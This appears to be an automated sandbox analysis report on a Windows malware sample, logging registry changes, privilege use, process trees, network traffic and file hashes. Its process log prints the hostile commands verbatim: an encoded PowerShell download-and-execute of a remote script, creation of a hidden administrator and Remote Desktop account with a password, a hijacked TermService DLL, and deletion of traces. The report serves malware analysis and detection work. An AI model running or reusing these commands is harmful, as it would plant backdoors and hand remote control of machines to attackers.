Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4648 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4648 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4756 wrote to memory of 4924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4756 wrote to memory of 4924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4924 wrote to memory of 4956 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4924 wrote to memory of 4956 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4756 wrote to memory of 5056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4756 wrote to memory of 5056 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4756 wrote to memory of 4280 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4756 wrote to memory of 4280 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4756 wrote to memory of 64 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4756 wrote to memory of 64 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4756 wrote to memory of 3852 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4756 wrote to memory of 3852 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4756 wrote to memory of 4040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4756 wrote to memory of 4040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4756 wrote to memory of 4072 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4756 wrote to memory of 4072 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4756 wrote to memory of 4424 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 4756 wrote to memory of 4424 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 4424 wrote to memory of 4444 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4424 wrote to memory of 4444 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4756 wrote to memory of 1648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4756 wrote to memory of 1648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1648 wrote to memory of 2892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1648 wrote to memory of 2892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2892 wrote to memory of 4588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2892 wrote to memory of 4588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4588 wrote to memory of 4596 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4588 wrote to memory of 4596 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4756 wrote to memory of 4240 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4756 wrote to memory of 4240 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4240 wrote to memory of 4576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4240 wrote to memory of 4576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4576 wrote to memory of 4568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4576 wrote to memory of 4568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4568 wrote to memory of 4704 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4568 wrote to memory of 4704 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4856 wrote to memory of 4920 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4856 wrote to memory of 4920 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4920 wrote to memory of 4948 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4920 wrote to memory of 4948 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4968 wrote to memory of 4996 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4968 wrote to memory of 4996 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4996 wrote to memory of 5016 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4996 wrote to memory of 5016 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 5032 wrote to memory of 4100 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 5032 wrote to memory of 4100 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4100 wrote to memory of 3912 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4100 wrote to memory of 3912 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2036 wrote to memory of 3560 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2036 wrote to memory of 3560 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3560 wrote to memory of 3364 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3560 wrote to memory of 3364 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3596 wrote to memory of 3040 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3596 wrote to memory of 3040 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3040 wrote to memory of 4252 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3040 wrote to memory of 4252 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 5096 wrote to memory of 4128 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 5096 wrote to memory of 4128 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4128 wrote to memory of 2232 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4128 wrote to memory of 2232 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3236 wrote to memory of 4264 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3236 wrote to memory of 4264 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe

"C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4uxgtjmy\4uxgtjmy.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7692.tmp" "c:\Users\Admin\AppData\Local\Temp\4uxgtjmy\CSC44318BFD60CB49CF9B55EE690A69664.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc TkxJONhF /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc TkxJONhF /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc TkxJONhF /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc TkxJONhF

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc TkxJONhF

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc TkxJONhF

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 www.speedtest.net udp
US 151.101.2.219:80 www.speedtest.net tcp
US 151.101.2.219:443 www.speedtest.net tcp
US 151.101.2.219:80 www.speedtest.net tcp
US 8.8.8.8:53 c.speedtest.net udp
US 151.101.2.219:443 c.speedtest.net tcp
US 8.8.8.8:53 speedtest.nl-ams.llhost-inc.eu udp
NL 5.101.44.180:8080 speedtest.nl-ams.llhost-inc.eu tcp
US 8.8.8.8:53 speedtest.host-palace.com udp
NL 43.239.142.115:8080 speedtest.host-palace.com tcp
US 8.8.8.8:53 nl.altushost.com udp
NL 79.142.67.67:8080 nl.altushost.com tcp
US 8.8.8.8:53 speedtesta.kpn.com udp
NL 195.121.118.196:8080 speedtesta.kpn.com tcp
US 8.8.8.8:53 zuvujvhuaif.xyz udp
MD 185.163.45.186:443 zuvujvhuaif.xyz tcp

Files

memory/4648-114-0x000001CD79DB0000-0x000001CD7A1AF000-memory.dmp

memory/4648-116-0x000001CD790C0000-0x000001CD790C2000-memory.dmp

memory/4648-117-0x000001CD790C3000-0x000001CD790C5000-memory.dmp

memory/4648-118-0x000001CD790C5000-0x000001CD790C6000-memory.dmp

memory/4648-119-0x000001CD790C6000-0x000001CD790C7000-memory.dmp

memory/4756-120-0x0000000000000000-mapping.dmp

memory/4756-126-0x0000027731C70000-0x0000027731C71000-memory.dmp

memory/4756-129-0x00000277326F0000-0x00000277326F1000-memory.dmp

memory/4756-130-0x0000027731CD0000-0x0000027731CD2000-memory.dmp

memory/4756-131-0x0000027731CD3000-0x0000027731CD5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

memory/4924-137-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\4uxgtjmy\4uxgtjmy.cmdline

MD5 3e05447e6c6a252a07b07d20e1b41aa8
SHA1 20a873edfb6549c4b38a7d8dde90442b74ef3810
SHA256 2594fc915cfc399fe0cbdffc5237a3957c0ca0c13cb7552cf09bcbdfcc033f18
SHA512 25ef5b816e3ad9347810365d70bbe169a4076814a876399990580ce487f362f4bd0c9a5a8055c2d7da77977cdb87fef9eed12cc4dc2813b310fd63c1be392aab

\??\c:\Users\Admin\AppData\Local\Temp\4uxgtjmy\4uxgtjmy.0.cs

MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

memory/4756-140-0x0000027731CD6000-0x0000027731CD8000-memory.dmp

memory/4956-141-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\4uxgtjmy\CSC44318BFD60CB49CF9B55EE690A69664.TMP

MD5 fcbafc207567a1012dc244098672e6fe
SHA1 7752fb795560b4b6b8c5a86623d2e46a21f0d72d
SHA256 37c35e26f05b48083acea7ab07f8dfb85f63d08d7c059af52d70d65f9334247d
SHA512 9b9b1f9641218936ec878f39ea0c490f98bf0f48469255b9bd369d4e7c441dafc73969bfcef23324749d416fd6b1b0851240e19072e6e68cb3bf89ddab90679a

C:\Users\Admin\AppData\Local\Temp\RES7692.tmp

MD5 f6d8f41f54b59fb31bd0a40c2c6f4779
SHA1 02520d32ca27da68b2b45d3f78a6874e4202beb4
SHA256 f015b1db7b548ebf9f7e7fa9c452b382039eb51d1e1e5726562208e7e72ef6b7
SHA512 0b2ebb4c3c32c62cd36e54b8996d8a078f778776399c765cecce21e3c09003e92f9093d382f436789eb75f1927d07597cae0ac9c5a0df490cb82fc50cffe0ebe

C:\Users\Admin\AppData\Local\Temp\4uxgtjmy\4uxgtjmy.dll

MD5 a1d7faff5112d1dc81f5a04be27b477c
SHA1 54955d6fe2bf8f736546b6574f9c0e5eff28f21c
SHA256 cfc76ffb75214acb069bc8aa69454c1a5b01157cee33886bc9cb159324dd8a91
SHA512 6c0c2b187acb15f598f8cb0c1006ddbc965f020eee58258730e5cd5c80937c286eefe297d56506e195b239784a64d9cc241a1c082c71bd3a79f93818191d8c77

memory/4756-145-0x0000027731CA0000-0x0000027731CA1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 9fca6b1768eba2c5d42f189123152e32
SHA1 560ec3249af6e8d82e994554475b870d32145352
SHA256 c5c7012656bfebd5ba7d4ae8459bd2fcc57ac661e413e2b1da339b9fba86de1f
SHA512 b72f2bc28dcde144596eabb62375479c4ddb3b004ac8759ee9523170289f55572784e695a552fd612a5dc5a56f6c76b3baee9831c7cac7123f72b2eb2aadb3f2

